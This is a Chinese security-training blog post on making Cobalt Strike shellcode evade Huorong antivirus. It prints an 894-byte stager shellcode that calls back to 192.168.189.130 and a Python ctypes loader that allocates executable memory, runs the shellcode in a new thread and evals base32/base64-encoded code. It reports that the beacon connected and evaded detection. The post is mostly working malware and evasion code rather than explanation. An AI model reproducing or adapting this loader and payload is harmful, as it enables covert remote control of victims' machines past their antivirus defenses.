网络安全实训11——Pyinstaller打包逆向分析火绒免杀
cs shellcode
打开
1
| java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
|
查看生成的 payload
1 2 3
| # length: 894 bytes buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xff\xff\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x54\x46\x4e\x75\x00\xaa\x70\x9b\x7f\x7e\xe2\x64\x6f\xcc\x10\x1b\x90\x61\x03\x39\x80\xc8\xa5\x0d\x12\x17\x65\xdb\x19\x76\x54\xe5\xc9\xad\xb7\xfd\xd9\x13\x72\x8a\xdd\x13\xc9\xc1\x62\x89\xeb\xe4\x0a\xb6\xcc\xc3\x4d\x97\xf0\xc4\xd2\x8a\x1a\x4c\x52\x5c\x04\xb1\xaa\xc5\x42\xaf\x31\xef\x1e\xb7\x0a\xf5\xd3\xea\x7a\x58\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x35\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x3b\x20\x44\x69\x67\x45\x78\x74\x3b\x20\x44\x54\x53\x20\x41\x67\x65\x6e\x74\x0d\x0a\x00\x12\xfb\x77\xa2\x83\x3b\xab\x20\x14\xd0\xde\x97\xd9\x52\xe5\x7d\x73\xb4\xab\x85\xba\x6e\xd4\xca\xdc\xce\x99\x2b\xd7\x24\xfa\x5f\x68\x01\x8f\x5d\xbc\x23\x11\x8d\x31\x7e\x54\x6f\x0e\xe6\x07\xe7\x6a\x34\x3a\xce\x13\x09\xa1\xc4\xe0\x28\xde\xaf\x4e\xf5\xa8\x0f\x01\xe7\x48\x8f\x23\x42\x4c\xd6\x08\x08\x01\xfa\x3e\x7d\x48\xef\x29\x1b\x72\xf3\x70\x01\xdd\x6d\x9c\x64\x5b\x51\x66\xef\x59\x59\x9d\xba\x70\xf4\x03\xa4\xad\x9d\x2d\xe2\x57\xcb\x89\x36\x26\x70\x67\xd7\x17\x48\x10\xf5\x34\x28\x37\x89\xe5\xc6\xc2\xf5\x3d\x75\x9a\xc7\x0b\xaf\xac\xa6\xea\xc4\x9f\x18\x25\x79\x68\x88\x59\x41\x6e\x22\x18\x63\x52\xf8\xca\x55\x6b\xf4\x77\xa2\x77\xb1\x18\x68\xd6\xb0\xd8\xfc\xdf\x7d\x5d\xbc\x14\x09\x56\x98\xc9\x70\x82\x40\x05\xf5\x84\xf4\x86\x0d\xf0\x6e\x52\x85\xa9\x0a\x8f\xbc\x22\x82\xb9\x25\xbf\x70\x90\x96\xb2\xb7\x63\xc4\xba\x85\x97\x4f\xca\x8d\x92\xec\x07\xa7\xbb\xbd\xe7\x1f\x83\xe7\xc7\x5c\x1f\x08\x0b\xad\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x38\x39\x2e\x31\x33\x30\x00\x12\x34\x56\x78"
|
直接运行,cs 直接上线
shellcode 免杀
这里采用 base32+base64 编码进行免杀
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
| # -*- encoding: utf-8 -*- # Time : 2021/04/29 11:19:04 # Author: crow
import ctypes import base64
shellcode = b"" # length: 894 bytes shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xff\xff\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x54\x46\x4e\x75\x00\xaa\x70\x9b\x7f\x7e\xe2\x64\x6f\xcc\x10\x1b\x90\x61\x03\x39\x80\xc8\xa5\x0d\x12\x17\x65\xdb\x19\x76\x54\xe5\xc9\xad\xb7\xfd\xd9\x13\x72\x8a\xdd\x13\xc9\xc1\x62\x89\xeb\xe4\x0a\xb6\xcc\xc3\x4d\x97\xf0\xc4\xd2\x8a\x1a\x4c\x52\x5c\x04\xb1\xaa\xc5\x42\xaf\x31\xef\x1e\xb7\x0a\xf5\xd3\xea\x7a\x58\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x35\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x3b\x20\x44\x69\x67\x45\x78\x74\x3b\x20\x44\x54\x53\x20\x41\x67\x65\x6e\x74\x0d\x0a\x00\x12\xfb\x77\xa2\x83\x3b\xab\x20\x14\xd0\xde\x97\xd9\x52\xe5\x7d\x73\xb4\xab\x85\xba\x6e\xd4\xca\xdc\xce\x99\x2b\xd7\x24\xfa\x5f\x68\x01\x8f\x5d\xbc\x23\x11\x8d\x31\x7e\x54\x6f\x0e\xe6\x07\xe7\x6a\x34\x3a\xce\x13\x09\xa1\xc4\xe0\x28\xde\xaf\x4e\xf5\xa8\x0f\x01\xe7\x48\x8f\x23\x42\x4c\xd6\x08\x08\x01\xfa\x3e\x7d\x48\xef\x29\x1b\x72\xf3\x70\x01\xdd\x6d\x9c\x64\x5b\x51\x66\xef\x59\x59\x9d\xba\x70\xf4\x03\xa4\xad\x9d\x2d\xe2\x57\xcb\x89\x36\x26\x70\x67\xd7\x17\x48\x10\xf5\x34\x28\x37\x89\xe5\xc6\xc2\xf5\x3d\x75\x9a\xc7\x0b\xaf\xac\xa6\xea\xc4\x9f\x18\x25\x79\x68\x88\x59\x41\x6e\x22\x18\x63\x52\xf8\xca\x55\x6b\xf4\x77\xa2\x77\xb1\x18\x68\xd6\xb0\xd8\xfc\xdf\x7d\x5d\xbc\x14\x09\x56\x98\xc9\x70\x82\x40\x05\xf5\x84\xf4\x86\x0d\xf0\x6e\x52\x85\xa9\x0a\x8f\xbc\x22\x82\xb9\x25\xbf\x70\x90\x96\xb2\xb7\x63\xc4\xba\x85\x97\x4f\xca\x8d\x92\xec\x07\xa7\xbb\xbd\xe7\x1f\x83\xe7\xc7\x5c\x1f\x08\x0b\xad\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x38\x39\x2e\x31\x33\x30\x00\x12\x34\x56\x78"
shellcode = bytearray(shellcode) # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc( ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40), )
# 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) )
string = "LEZVENLDI5LHUTDOMRYGE3KSONREGNLSLJMEU5K2K53XUTLJGVJWIR3YJZRDGWTMKRLVM5DCGNFDKS2HJYYGKWCCNRRXSNLKLAZVM4DCNZITETSDNB3WISCJOBGEGQTJMRLVS42JI5HDAZKYIJWGG6JVNJMDE3DVMRBWQ422K42G6YZSNBWGER3YNJRDEUTMJNJWW4A="
eval(base64.b64decode(base64.b32decode(string)))
# 创建一个线程从shellcode防止位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)), ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
|
尝试使用 pyminifier 混淆
liftoff/pyminifier: Pyminifier is a Python code minifier, obfuscator, and compressor. (github.com)
但是这个是 Python2 的环境,我所有环境都是 Python3,失败告终
看了一眼兵哥的实验报告
免杀成功
上线